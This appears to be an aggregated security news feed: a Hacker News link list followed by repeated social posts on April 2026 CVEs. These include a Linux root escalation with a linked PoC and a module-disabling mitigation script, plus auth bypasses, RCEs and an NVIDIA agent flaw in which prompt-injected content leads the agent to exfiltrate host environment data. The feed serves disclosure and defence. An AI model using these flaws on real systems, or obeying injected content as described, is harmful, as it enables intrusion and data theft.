----------------------------------------
🔖 Title: Zed 1.0
🔗 URL: https://zed.dev/blog/zed-1-0
👍 Score: [1012]
💬 Discussion: https://news.ycombinator.com/item?id=47949027
----------------------------------------
🔖 Title: Bugs Rust won't catch
🔗 URL: https://corrode.dev/blog/bugs-rust-wont-catch/
👍 Score: [565]
💬 Discussion: https://news.ycombinator.com/item?id=47943499
----------------------------------------
🔖 Title: Soft launch of open-source code platform for government
🔗 URL: https://www.nldigitalgovernment.nl/news/soft-launch-for-government-open-source-code-platform/
👍 Score: [456]
💬 Discussion: https://news.ycombinator.com/item?id=47945918
----------------------------------------
🔖 Title: We need a federation of forges
🔗 URL: https://blog.tangled.org/federation/
👍 Score: [413]
💬 Discussion: https://news.ycombinator.com/item?id=47948603
----------------------------------------
🔖 Title: Online age verification is the hill to die on
🔗 URL: https://x.com/GlennMeder/status/2049088498163216560
👍 Score: [407]
💬 Discussion: https://news.ycombinator.com/item?id=47950091
----------------------------------------
🔖 Title: Mistral Medium 3.5
🔗 URL: https://mistral.ai/news/vibe-remote-agents-mistral-medium-3-5
👍 Score: [263]
💬 Discussion: https://news.ycombinator.com/item?id=47949642
----------------------------------------
🔖 Title: Cursor Camp
🔗 URL: https://neal.fun/cursor-camp/
👍 Score: [148]
💬 Discussion: https://news.ycombinator.com/item?id=47949939
----------------------------------------
🔖 Title: FastCGI: 30 years old and still the better protocol for reverse proxies
🔗 URL: https://www.agwa.name/blog/post/fastcgi_is_the_better_protocol_for_reverse_proxies
👍 Score: [118]
💬 Discussion: https://news.ycombinator.com/item?id=47950510
----------------------------------------
🔖 Title: Third Editor Fired in Elsevier's Citation Cartel Crackdown
🔗 URL: https://www.chrisbrunet.com/p/third-editor-fired-in-elseviers-citation
👍 Score: [101]
💬 Discussion: https://news.ycombinator.com/item?id=47950022
----------------------------------------
🔖 Title: Letting AI play my game – building an agentic test harness to help play-testing
🔗 URL: https://blog.jeffschomay.com/letting-ai-play-my-game
👍 Score: [98]
💬 Discussion: https://news.ycombinator.com/item?id=47947525
----------------------------------------
🔖 Title: Linux 7.0 Broke PostgreSQL: The Preemption Regression Explained
🔗 URL: https://read.thecoder.cafe/p/linux-broke-postgresql
👍 Score: [95]
💬 Discussion: https://news.ycombinator.com/item?id=47949585
----------------------------------------
🔖 Title: Copy Fail – CVE-2026-31431
🔗 URL: https://copy.fail/
👍 Score: [93]
💬 Discussion: https://news.ycombinator.com/item?id=47952181
----------------------------------------
🔖 Title: Maryland becomes first state to ban surveillance pricing in grocery stores
🔗 URL: https://www.theguardian.com/technology/2026/apr/29/maryland-grocery-stores-ban-surveillance-pricing
👍 Score: [90]
💬 Discussion: https://news.ycombinator.com/item?id=47951007
----------------------------------------
🔖 Title: GitHub – DOS 1.0: Transcription of Tim Paterson's DOS Printouts
🔗 URL: https://github.com/DOS-History/Paterson-Listings
👍 Score: [85]
💬 Discussion: https://news.ycombinator.com/item?id=47946813
----------------------------------------
🔖 Title: An open-source stethoscope that costs between $2.5 and $5 to produce
🔗 URL: https://github.com/GliaX/Stethoscope
👍 Score: [81]
💬 Discussion: https://news.ycombinator.com/item?id=47949204
----------------------------------------
🔖 Title: Improving ICU handovers by learning from Scuderia Ferrari F1 team
🔗 URL: https://healthmanagement.org/c/icu/IssueArticle/improving-handovers-by-learning-from-scuderia-ferrari
👍 Score: [46]
💬 Discussion: https://news.ycombinator.com/item?id=47947834
----------------------------------------
🔖 Title: Laws of UX
🔗 URL: https://lawsofux.com/
👍 Score: [37]
💬 Discussion: https://news.ycombinator.com/item?id=47951137
----------------------------------------
🔖 Title: Ramp's Sheets AI Exfiltrates Financials
🔗 URL: https://www.promptarmor.com/resources/ramps-sheets-ai-exfiltrates-financials
👍 Score: [31]
💬 Discussion: https://news.ycombinator.com/item?id=47951786
----------------------------------------
🔖 Title: How to Build the Future: Demis Hassabis [video]
🔗 URL: https://www.youtube.com/watch?v=JNyuX1zoOgU
👍 Score: [31]
💬 Discussion: https://news.ycombinator.com/item?id=47948664
----------------------------------------
🔖 Title: Show HN: A new benchmark for testing LLMs for deterministic outputs
🔗 URL: https://interfaze.ai/blog/introducing-structured-output-benchmark
👍 Score: [26]
💬 Discussion: https://news.ycombinator.com/item?id=47950283
----------------------------------------
Copy Fail – CVE-2026-31431
Link: https://copy.fail/
Discussion: https://news.ycombinator.com/item?id=47952181
Copy Fail – CVE-2026-31431 - https://copy.fail/
##Copy Fail – CVE-2026-31431
#HackerNews #CopyFail #CVE2026 #Security #Vulnerability #HackerNews #TechNews
##Copy Fail – CVE-2026-31431
https://copy.fail/
Discussion: https://news.ycombinator.com/item?id=47952181
CVE-2026-31431 is a Linux LPE, PoC script roots every distribution shipped since 2017 https://copy.fail/
##This is bad…
---
CVE-2026-31431. 100% Reliable Linux LPE — no race, no per-distro offsets, page-cache write that bypasses on-disk file-integrity tools and crosses containers. Found by Xint Code.
This is what I'm pasting into my own linux systems to implement the mitigation #cve_2026_31431 suggested at the #copyfail website.
It may not be right for you. The 'chattr +i' may make it more difficult to undo!
MIT license, or at least its disclaimers, apply.
f=disable-algif_aead-CVE-2026-31431.conf
if ! [ -d /etc/modprobe.d ]; then
printf 'This system does not seem to have a /etc/modprobe.d dir, so this script would need to be adapted.\n' >&2
return 74
else
sudo /bin/env -i /bin/sh -c 'set -x;set -e;cd /etc/modprobe.d;umask 133;printf '\''install algif_aead /bin/false\n'\'' >'"$f"';chattr +i '"$f"
fi
sudo /bin/env -i /bin/sh -c '(set -x;rmmod -v algif_aead)2>&1|grep -v "is not currently loaded"'
ls -l /etc/modprobe.d/$f
cat -t /etc/modprobe.d/$f
🚨 CVE-2026-31431 (Copy Fail)
In the Linux kernel, the following vulnerability has been resolved:
crypto: algif_aead - Revert to operating out-of-place
This mostly reverts commit 72548b093ee3 except for the copying of the associated data.
There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings. Get rid of all the complexity added for in-place operation and just copy the AD directly.
ℹ️ Additional info on ZEN SecDB https://secdb.nttzen.cloud/cve/detail/CVE-2026-31431
#nttdata #zen #secdb #infosec
#copyfail #cve202631431 #linux #kernel
@krypt3ia @Viss https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py
##Copy Fail — CVE-2026-31431 Linux Privilege Escalation https://copy.fail/
##Wir checken Eure Linux-Distro! Kommt beim nächsten #DiDay mit euren abgehangenen 5-er Kerneln vorbei und wir halten Händchen, während wir gemeinsam exploit.py von CVE-2026-31431 ausführen.
##https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py
##Copy Fail – CVE-2026-31431
Link: https://copy.fail/
Discussion: https://news.ycombinator.com/item?id=47952181
Hello
I am here to ruin your day again
https://copy.fail/ / CVE-2026-31431
Seems RHEL don't think this is all that important, CloudLinux's kernel image (presumably derived from RHEL) has the problem module built in, so you can't even mitigate while we wait for patching. CageFS does help as - afaict - no setuid binaries are included in the default cagefs env. Many Debian versions lack a patch at time of writing, but blocking the module did work for me.
##@mttaggart And yet RHEL has "fix deferred" for all affected OSes.
Looks like it requires a local user account, with a password set, to exploit, yes?
##RE: https://hachyderm.io/@petrillic/116489574280084326
I have had a confirmation that it can work on the Amazon Linux kernel, but also RHEL says "fix deferred" for all affected RHEL versions: https://access.redhat.com/security/cve/cve-2026-31431
##I’m a bit surprised they did not wait till a patch was available for the major distros. Smells like an IPO or the next round of funding is coming soon.
You probably want to keep a close eye on any system you maintain where unprivileged users have shell access and update as soon as possible.
https://security-tracker.debian.org/tracker/CVE-2026-31431
https://ubuntu.com/security/CVE-2026-31431
##Ooooh, nice:
https://xint.io/blog/copy-fail-linux-distributions
CVE-2026-31431: Local privilege escalation to root using a trivial 732 byte python script for pretty much every Linux distribution since 2017.
##Copy Fail – CVE-2026-31431
https://news.ycombinator.com/item?id=47952181
Copy Fail – CVE-2026-31431
Link: https://copy.fail/
Discussion: https://news.ycombinator.com/item?id=47952181
Copy Fail – CVE-2026-31431
Link: https://copy.fail/
Comments: https://news.ycombinator.com/item?id=47952181
Copy Fail – CVE-2026-31431
Link: https://copy.fail/
Discussion: https://news.ycombinator.com/item?id=47952181
Copy Fail – CVE-2026-31431
#HackerNews #CopyFail #CVE2026 #Security #Vulnerability #HackerNews #TechNews
##updated 2026-04-29T21:13:30.563000
2 posts
1 repos
🟠 CVE-2026-6849 - High (8.8)
Improper neutralization of special elements used in an OS command ('OS command injection') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus OS My Computer allows OS Command Injection.
This issue affects Pardus OS My...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-6849/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-6849 - High (8.8)
Improper neutralization of special elements used in an OS command ('OS command injection') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus OS My Computer allows OS Command Injection.
This issue affects Pardus OS My...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-6849/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-29T20:16:32.143000
2 posts
🟠 CVE-2026-7426 - High (8.1)
Insufficient validation of the prefix length field in IPv6 Router Advertisement processing in FreeRTOS-Plus-TCP before V4.2.6 and V4.4.1 allows an adjacent network actor to cause memory corruption by sending a crafted Router Advertisement with a p...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7426/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-7426 - High (8.1)
Insufficient validation of the prefix length field in IPv6 Router Advertisement processing in FreeRTOS-Plus-TCP before V4.2.6 and V4.4.1 allows an adjacent network actor to cause memory corruption by sending a crafted Router Advertisement with a p...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7426/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-29T19:16:27.013000
2 posts
🟠 CVE-2026-7466 - High (8.8)
AgentFlow contains an arbitrary code execution vulnerability that allows attackers to execute local Python pipeline files by supplying a user-controlled pipeline_path parameter to the POST /api/runs and POST /api/runs/validate endpoints. Attackers...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7466/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-7466 - High (8.8)
AgentFlow contains an arbitrary code execution vulnerability that allows attackers to execute local Python pipeline files by supplying a user-controlled pipeline_path parameter to the POST /api/runs and POST /api/runs/validate endpoints. Attackers...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7466/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-29T19:16:26.743000
2 posts
🟠 CVE-2026-7424 - High (8.1)
Integer underflow in the DHCPv6 sub-option parser in FreeRTOS-Plus-TCP before V4.4.1 and V4.2.6 allows an adjacent network actor to corrupt the device's IPv6 address assignment, DNS configuration, and lease times, and to cause a denial of service ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7424/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-7424 - High (8.1)
Integer underflow in the DHCPv6 sub-option parser in FreeRTOS-Plus-TCP before V4.4.1 and V4.2.6 allows an adjacent network actor to corrupt the device's IPv6 address assignment, DNS configuration, and lease times, and to cause a denial of service ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7424/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-29T19:16:23.930000
7 posts
2 repos
https://github.com/debugactiveprocess/cPanel-WHM-AuthBypass-Session-Checker
@mttaggart Detailed analysis by Watchtowr: https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/
##The Internet Is Falling Down, Falling Down, Falling Down (cPanel & WHM Authentication Bypass CVE-2026-41940) https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/
##The Internet Is Falling Down, Falling Down, Falling Down (cPanel & WHM Authentication Bypass CVE-2026-41940)
#CVE_2026_41940
https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/
The Internet Is Falling Down, Falling Down, Falling Down (cPanel & WHM Authentication Bypass CVE-2026-41940) - watchTowr Labs https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/
##@mttaggart Detailed analysis by Watchtowr: https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/
##The Internet Is Falling Down, Falling Down, Falling Down (cPanel & WHM Authentication Bypass CVE-2026-41940)
#CVE_2026_41940
https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/
The Internet Is Falling Down, Falling Down, Falling Down (cPanel & WHM Authentication Bypass CVE-2026-41940) - watchTowr Labs https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/
##updated 2026-04-29T18:31:42
2 posts
🟠 CVE-2026-0204 - High (8)
A vulnerability in the access control mechanism of SonicOS may allow certain management interface functions to be accessible under specific conditions.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0204/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-0204 - High (8)
A vulnerability in the access control mechanism of SonicOS may allow certain management interface functions to be accessible under specific conditions.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0204/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-29T18:31:41
2 posts
🟠 CVE-2026-5712 - High (8)
This vulnerability impacts all versions of IdentityIQ and allows an authenticated identity that is the requestor or assignee of a work item to edit the definition of a role without having an assigned capability that would allow role editing.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-5712/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-5712 - High (8)
This vulnerability impacts all versions of IdentityIQ and allows an authenticated identity that is the requestor or assignee of a work item to edit the definition of a role without having an assigned capability that would allow role editing.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-5712/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-29T15:31:44
1 posts
CRITICAL: Chrome <147.0.7727.138 on Windows is vulnerable to a use-after-free in Accessibility (CVE-2026-7344). Allows sandbox escape after renderer compromise. Patch now to mitigate risk. https://radar.offseq.com/threat/cve-2026-7344-use-after-free-in-google-chrome-1aabf4b9 #OffSeq #Chrome #Vuln #Cybersecurity
##updated 2026-04-29T15:31:43
1 posts
⚠️ CRITICAL: CVE-2026-7343 in Chrome (Windows <147.0.7727.138) is a use-after-free in Views that could allow renderer sandbox escape. Patch ASAP to mitigate. No known exploits yet. https://radar.offseq.com/threat/cve-2026-7343-use-after-free-in-google-chrome-6725c92f #OffSeq #Chrome #Vulnerability #Security
##updated 2026-04-29T15:31:38
2 posts
1 repos
CERT/CC issued advisory VU#915947 for SGLang (an AI inference server), CVE-2026-5760, severity 9.8. A poisoned GGUF model file carries a chat-template that SGLang renders through Jinja2 with no sandbox. Arbitrary Python runs on the host. Same root cause as llama-cpp-python (2024) and vLLM (2025). Sandboxed Jinja2 existed the whole time and three frameworks left the line untouched. Any GGUF you did not build yourself runs code on load.
##CERT/CC issued advisory VU#915947 for SGLang (an AI inference server), CVE-2026-5760, severity 9.8. A poisoned GGUF model file carries a chat-template that SGLang renders through Jinja2 with no sandbox. Arbitrary Python runs on the host. Same root cause as llama-cpp-python (2024) and vLLM (2025). Sandboxed Jinja2 existed the whole time and three frameworks left the line untouched. Any GGUF you did not build yourself runs code on load.
##updated 2026-04-29T09:30:25
2 posts
New HIGH severity vuln: CVE-2026-42515 impacts CDAC-Noida e-Sushrut HMIS (CVSS 7.1). Authenticated users can bypass auth via manipulated API params — risking patient data. No patch yet. Restrict access & monitor vendor updates. https://radar.offseq.com/threat/cve-2026-42515-cwe-639-authorization-bypass-throug-ffcae9ae #OffSeq #Healthcare #CVE #Security
##New HIGH severity vuln: CVE-2026-42515 impacts CDAC-Noida e-Sushrut HMIS (CVSS 7.1). Authenticated users can bypass auth via manipulated API params — risking patient data. No patch yet. Restrict access & monitor vendor updates. https://radar.offseq.com/threat/cve-2026-42515-cwe-639-authorization-bypass-throug-ffcae9ae #OffSeq #Healthcare #CVE #Security
##updated 2026-04-29T06:33:35
2 posts
RE: https://infosec.exchange/@cR0w/116483262430297764
lol
##🔎 XSS (HIGH, CVSS 7.2) in GCHQ CyberChef <11.0.0 (CVE-2026-42615): Improper input neutralization in Show Base64 offsets lets attackers inject scripts remotely — info theft/session hijack possible. No fix yet. Avoid untrusted input. https://radar.offseq.com/threat/cve-2026-42615-cwe-79-improper-neutralization-of-i-760a9adb #OffSeq #CyberChef #XSS
##updated 2026-04-29T06:33:30
2 posts
⛔ New security advisory:
CVE-2026-7321 affects multiple systems.
• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems
Full breakdown:
https://www.yazoul.net/advisory/cve/cve-2026-7321-firefox-sandbox-escape-leaks-all-user-data
🔴 CVE-2026-7321 - Critical (9.6)
Sandbox escape due to incorrect boundary conditions in the WebRTC: Networking component. This vulnerability was fixed in Firefox ESR 140.10.1.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7321/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-29T04:16:40.867000
1 posts
MEDIUM severity SSRF (CVE-2026-23773) found in Dell DLm8700 📢. Low-priv remote attackers can trigger server-side requests. No known exploits, no patch yet — restrict access & follow vendor advisories. https://radar.offseq.com/threat/cve-2026-23773-cwe-918-server-side-request-forgery-08701a02 #OffSeq #SSRF #Dell #Cybersecurity
##updated 2026-04-29T00:31:25
2 posts
🚨 New security advisory:
CVE-2026-41873 affects Apache Pony Mail.
• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems
Full breakdown:
https://www.yazoul.net/advisory/cve/cve-2026-41873-pony-mail-admin-takeover
🔴 CVE-2026-41873 - Critical (9.8)
** UNSUPPORTED WHEN ASSIGNED ** Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') vulnerability in Pony Mail leading to admin account takeover.
This issue affects all versions of the Lua implementation of Pony Mail....
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41873/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-29T00:30:29
5 posts
2 repos
CVE-2026-42167 Allows Auth Bypass And RCE In ProFTPD
https://zeropath.com/blog/proftpd-cve-2026-42167-auth-bypass-privesc-rce
CVE-2026-42167 Allows Auth Bypass And RCE In ProFTPD
#CVE_2026_42167
https://zeropath.com/blog/proftpd-cve-2026-42167-auth-bypass-privesc-rce
CVE-2026-42167 Allows Auth Bypass And RCE In ProFTPD
https://zeropath.com/blog/proftpd-cve-2026-42167-auth-bypass-privesc-rce
CVE-2026-42167 Allows Auth Bypass And RCE In ProFTPD
#CVE_2026_42167
https://zeropath.com/blog/proftpd-cve-2026-42167-auth-bypass-privesc-rce
🟠 CVE-2026-42167 - High (8.1)
mod_sql in ProFTPD before 1.3.10rc1 allows remote attackers to execute arbitrary code via a username, in scenarios where there is logging of USER requests with an expansion such as %U, and the SQL backend allows commands (e.g., COPY TO PROGRAM).
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-42167/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-28T21:37:03
13 posts
Broadcom has a new advisory for a critical vulnerability:
ESM Microservice 15.0 Vulnerability in Apache Tomcat https://support.broadcom.com/web/ecx/security-advisory #Broadcom #ApacheTomCat
---
Cisco has tagged the Internet Systems Consortium and wolfSSL for zero-day reports https://talosintelligence.com/vulnerability_info @TalosSecurity #zeroday
---
From yesterday:
CISA added two vulnerabilities to the KEV catalogue:
- CVE-2026-32202: Microsoft Windows Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-32202
- CVE-2024-1708: ConnectWise ScreenConnect Path Traversal Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-1708
- Also, one industrial vulnerability https://www.cisa.gov/news-events/ics-advisories/icsa-26-118-01 #CISA #Microsoft #vulnerability #infosec
##📢 CVE-2026-32202 : faille Windows Shell activement exploitée, liée à APT28
📝 ## 🗓️ Contexte
Publié le 28 avril 2026 par The Cyber Security Hub sur LinkedIn, cet article rapporte la confirmation par Microsoft de l'e...
📖 cyberveille : https://cyberveille.ch/posts/2026-04-29-cve-2026-32202-faille-windows-shell-activement-exploitee-liee-a-apt28/
🌐 source : https://www.linkedin.com/pulse/warning-windows-shell-flaw-cve-2026-32202-actively-em86f
#APT28 #CVE_2026_21510 #Cyberveille
CISA's KEV catalog now includes CVE-2024-1708 and CVE-2024-1709 (ConnectWise ScreenConnect auth bypass + RCE chain) plus CVE-2026-32202 (Windows Shell). APT28 has been weaponizing these since December 2025. The...
##📢 Patch incomplet d'APT28 : CVE-2026-21510 laisse place à CVE-2026-32202, coercition d'authentification zero-click
📝 ## 🔍 Contexte
Publié le 23 avril 2026 par Maor Daha...
📖 cyberveille : https://cyberveille.ch/posts/2026-04-29-patch-incomplet-d-apt28-cve-2026-21510-laisse-place-a-cve-2026-32202-coercition-d-authentification-zero-click/
🌐 source : https://www.akamai.com/blog/security-research/incomplete-patch-apt28s-zero-day-cve-2026-32202
#APT28 #CVE_2026_21510 #Cyberveille
Microsoft Confirms Active Exploitation of Windows Shell Flaw CVE-2026-32202
Microsoft confirmed active exploitation of CVE-2026-32202, a Windows Shell flaw that allows zero-click NTLM credential theft via malicious LNK files. The vulnerability is an incomplete fix for earlier RCE flaws used by the APT28 threat group in targeted espionage campaigns.
**Apply Microsoft's April 2026 patches immediately to all Windows systems, as this vulnerability steals your credentials just by viewing a folder containing a malicious shortcut file - no clicking required. Block outbound SMB traffic (ports 445 and 139) at your firewall to prevent credential theft.**
#cybersecurity #infosec #attack #activeexploit
https://beyondmachines.net/event_details/microsoft-confirms-active-exploitation-of-windows-shell-flaw-cve-2026-32202-0-8-6-0-i/gD2P6Ple2L
Vols d’identifiants sur Windows : Microsoft révèle l’exploitation de la CVE-2026-32202 https://www.it-connect.fr/vols-didentifiants-sur-windows-microsoft-revele-lexploitation-de-la-cve-2026-32202/ #ActuCybersécurité #Cybersécurité #Vulnérabilité #Microsoft #Windows
##Broadcom has a new advisory for a critical vulnerability:
ESM Microservice 15.0 Vulnerability in Apache Tomcat https://support.broadcom.com/web/ecx/security-advisory #Broadcom #ApacheTomCat
---
Cisco has tagged the Internet Systems Consortium and wolfSSL for zero-day reports https://talosintelligence.com/vulnerability_info @TalosSecurity #zeroday
---
From yesterday:
CISA added two vulnerabilities to the KEV catalogue:
- CVE-2026-32202: Microsoft Windows Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-32202
- CVE-2024-1708: ConnectWise ScreenConnect Path Traversal Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-1708
- Also, one industrial vulnerability https://www.cisa.gov/news-events/ics-advisories/icsa-26-118-01 #CISA #Microsoft #vulnerability #infosec
##Microsoft Confirms Active Exploitation of Windows Shell Flaw CVE-2026-32202
Microsoft confirmed active exploitation of CVE-2026-32202, a Windows Shell flaw that allows zero-click NTLM credential theft via malicious LNK files. The vulnerability is an incomplete fix for earlier RCE flaws used by the APT28 threat group in targeted espionage campaigns.
**Apply Microsoft's April 2026 patches immediately to all Windows systems, as this vulnerability steals your credentials just by viewing a folder containing a malicious shortcut file - no clicking required. Block outbound SMB traffic (ports 445 and 139) at your firewall to prevent credential theft.**
#cybersecurity #infosec #attack #activeexploit
https://beyondmachines.net/event_details/microsoft-confirms-active-exploitation-of-windows-shell-flaw-cve-2026-32202-0-8-6-0-i/gD2P6Ple2L
Vols d’identifiants sur Windows : Microsoft révèle l’exploitation de la CVE-2026-32202 https://www.it-connect.fr/vols-didentifiants-sur-windows-microsoft-revele-lexploitation-de-la-cve-2026-32202/ #ActuCybersécurité #Cybersécurité #Vulnérabilité #Microsoft #Windows
##🚨 [CISA-2026:0428] CISA Adds 2 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0428)
CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2024-1708 (https://secdb.nttzen.cloud/cve/detail/CVE-2024-1708)
- Name: ConnectWise ScreenConnect Path Traversal Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: ConnectWise
- Product: ScreenConnect
- Notes: https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8 ; https://nvd.nist.gov/vuln/detail/CVE-2024-1708
⚠️ CVE-2026-32202 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-32202)
- Name: Microsoft Windows Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-32202 ; https://nvd.nist.gov/vuln/detail/CVE-2026-32202
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260428 #cisa20260428 #cve_2024_1708 #cve_2026_32202 #cve20241708 #cve202632202
##🛡️ Title: Windows Shell Spoofing Vulnerability
Description
🛡️ Protection mechanism failure in Windows Shell allows an unauthorized attacker to perform spoofing over a network.
##CVE ID: CVE-2026-32202
Vendor: Microsoft
Product: Windows
Date Added: 2026-04-28
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-32202
Microsoft Confirms Active Exploitation of Windows Shell CVE-2026-32202
https://thehackernews.com/2026/04/microsoft-confirms-active-exploitation.html
Read on HackerWorkspace: https://hackerworkspace.com/article/microsoft-confirms-active-exploitation-of-windows-shell-cve-2026-32202
##updated 2026-04-28T21:37:03
6 posts
Critical Unpatched RCE Vulnerability in Hugging Face LeRobot Robotics Platform
Hugging Face's LeRobot robotics platform contains a critical unpatched vulnerability (CVE-2026-25874) that allows unauthenticated remote code execution via unsafe pickle deserialization. Attackers can exploit exposed gRPC endpoints to take full control of robotics servers and connected hardware.
**If you're using Hugging Face LeRobot, make sure all robot devices and servers are isolated from the internet and accessible only from trusted networks. Until version 0.6.0 is released with a fix for CVE-2026-25874, run LeRobot as a non-root user inside restricted containers, and monitor for unusual processes or outbound traffic.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-unpatched-rce-vulnerability-in-hugging-face-lerobot-robotics-platform-z-j-o-7-g/gD2P6Ple2L
Critical Unpatched RCE Vulnerability in Hugging Face LeRobot Robotics Platform
Hugging Face's LeRobot robotics platform contains a critical unpatched vulnerability (CVE-2026-25874) that allows unauthenticated remote code execution via unsafe pickle deserialization. Attackers can exploit exposed gRPC endpoints to take full control of robotics servers and connected hardware.
**If you're using Hugging Face LeRobot, make sure all robot devices and servers are isolated from the internet and accessible only from trusted networks. Until version 0.6.0 is released with a fix for CVE-2026-25874, run LeRobot as a non-root user inside restricted containers, and monitor for unusual processes or outbound traffic.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-unpatched-rce-vulnerability-in-hugging-face-lerobot-robotics-platform-z-j-o-7-g/gD2P6Ple2L
Critical Unpatched Flaw Leaves Hugging Face LeRobot Open to Unauthenticated RCE
https://thehackernews.com/2026/04/critical-cve-2026-25874-leaves-hugging.html
Read on HackerWorkspace: https://hackerworkspace.com/article/critical-unpatched-flaw-leaves-hugging-face-lerobot-open-to-unauthenticated-rce
##📰 Critical Unpatched RCE Flaw in Hugging Face's LeRobot AI Platform Puts Robotics Systems at Risk
🚨 CRITICAL FLAW: Unpatched RCE (CVE-2026-25874, CVSS 9.3) in Hugging Face's LeRobot AI platform. Unsafe deserialization allows unauthenticated attackers to execute code. #CVE202625874 #HuggingFace #AI #RCE
##May I suggest...not exposing your robot control plane to the internet
##The vulnerability in question is CVE-2026-25874 (CVSS score: 9.3), which has been described as a case of untrusted data deserialization stemming from the use of the unsafe pickle format. https://thehackernews.com/2026/04/critical-cve-2026-25874-leaves-hugging.html
##updated 2026-04-28T21:36:23
2 posts
🟠 CVE-2026-24222 - High (8.6)
NVIDIA NeMoClaw contains a vulnerability in the sandbox environment initialization component, where a remote attacker could cause improper access control by sending prompt-injected content that causes the agent to read and exfiltrate host environm...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24222/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##Nvidia has posted two advisories:
"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."
- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 https://nvidia.custhelp.com/app/answers/detail/a_id/5819
"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."
- High: CVE-2026-24222 and CVE-2026-24231: https://nvidia.custhelp.com/app/answers/detail/a_id/5837 #Nvidia #infoec #vulnerability
##updated 2026-04-28T21:36:23
1 posts
Nvidia has posted two advisories:
